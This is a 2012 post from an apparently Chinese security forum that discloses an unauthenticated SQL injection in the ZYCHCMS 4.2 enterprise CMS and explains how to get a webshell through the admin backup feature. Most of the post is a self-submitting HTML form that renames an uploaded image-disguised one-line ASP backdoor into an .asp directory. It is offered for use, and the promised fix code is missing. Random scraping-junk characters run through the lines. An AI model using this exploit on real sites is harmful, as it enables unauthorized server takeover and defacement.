找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1735|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
! e- M' X% Y, O% ^/ Y7 h  A
' Z! M; ?" A& c) U3 o, m
( [* k/ T' @8 f: x5 U2 t) ?
' i) j+ X4 I' i0 j" B( N& X% L: Z
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
0 |" f+ ?  h0 S% c. P( A ①SQL注射漏洞
5 N" {  N+ ?7 d9 X+ p. P7 ?/ A 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
( E( M& x& U0 P8 t. ` 漏洞原因:未过滤
0 p8 x% c9 P5 X9 }3 [ 漏洞代码:
. j  Y0 I! a* m' N9 Q 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
7 I; `7 [' }. ?% f; `5 y 修复方法:在文件开头加入代码
8 Y, k8 S8 W1 i" E) p# R& q! J
" ~9 C" D6 a0 M) B5 i/ p& i# S6 r9 o# `
②后台拿WBSHELL
  A+ n9 m2 a5 y9 p% ^ 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。. W6 H. Y) t$ K$ p/ g+ Z/ @
这里在网上找了一个,改了下,将就着用。
& Y( s* M# q6 L& m- w" m 以下是代码本地提交代码
+ v+ H' D8 W1 C3 ?  O% i5 a
  r$ W: `; L0 r. O, `  Y; D* T2 r  p! X4 J
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
9 ?  l& }8 z" _+ i* J$ I  G( b, Q <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>/ e7 k$ ]% h% H: S2 w: ?9 M; a
<tr>1 P- K; Y  p. G+ \
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
+ x, n+ y9 I* o2 b </tr>. n$ y; {  f8 l' u
<tr>& M0 W* C. U, f7 z" J; s
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
  Z4 `. x( g$ _9 u2 Z/ c( A </span>0 D! h* P& T1 }9 o5 B& w
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
; a. t$ c: ~- ?& }; F' x5 b <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >- C& @- A( U: O: P
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>4 o( H( Y& ?' p# t/ I
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d1 V$ T; d; [) W' ~; h4 t
<div align=”left”>
' Y6 c# A6 s( V1 B/ f# W1 p8 y; ` <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />9 r: ]$ o/ B: |. g
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
% ]5 j/ v0 c8 u* @6 v <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />$ t  u* C3 C6 o, P
</div></td>9 Q$ M# r4 a2 p) J, u( W9 C: H
</tr>
2 Z. b/ Y) a1 }! K0 p <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
6 p. o" {" u5 `$ X) ^ <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>' l) }% M+ c' i9 q- c3 I2 o6 D
<td class=”td”><div align=”left”>0 D% a4 B, K+ r, E+ w  C4 H/ V
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />. S: l$ O# j& m/ [0 s4 G
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
4 O8 Y8 g8 N9 \+ V5 s </tr>1 H/ \7 a3 J' `  M
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>+ Z: D4 |- Z- M+ f
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>1 W: v$ W& {5 _4 L+ J  ~
<td class=”td”><div align=”left”>
# q7 U0 ]* U% h+ X- H  D( O5 Y <input type=”submit” value=”确定备份” class=”btn”2 U% ?% w1 ~- ^, ^9 K. y
</div></td>
4 s9 d/ ~2 O& k7 \ </tr>
& D4 ]0 a5 V: G  q5 E$ T6 ^ </table></td></tr></form># K, n  e9 B+ Z2 b2 a# \5 t
</table>
8 N, N- k5 @4 m+ e+ O% ` </td>: h+ R$ l- E- r2 b) D9 g
</tr>
  ]9 P6 C# f% w9 M  r. \ </table>
' b3 a/ v: D. O8 O2 ~3 E <script>
' n/ G) ^' L$ O' t7 M document.all.add.submit();
9 k' p( u) {5 S </script>
4 [4 W% Z% m* K; c5 F1 f
  n- G5 g3 T9 i! N" f' c& y7 _5 w! ~% U8 w8 O% m, y* P

" _* E. L/ C8 V( M5 |( b% v/ a. D3 t( d0 T; ?6 \! X9 r" ]

( M9 _' h: A$ R+ O+ N* _2 r  T$ s- D* t8 v% Q( S3 h
6 F( J: K$ |8 a# t0 ?+ [9 K/ p. e+ w
! D, V0 G5 Y) X# ~; }# O- M

. ~( `; Q( ?7 a. R# T' w1 D% P2 h+ P2 E) [0 F6 s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表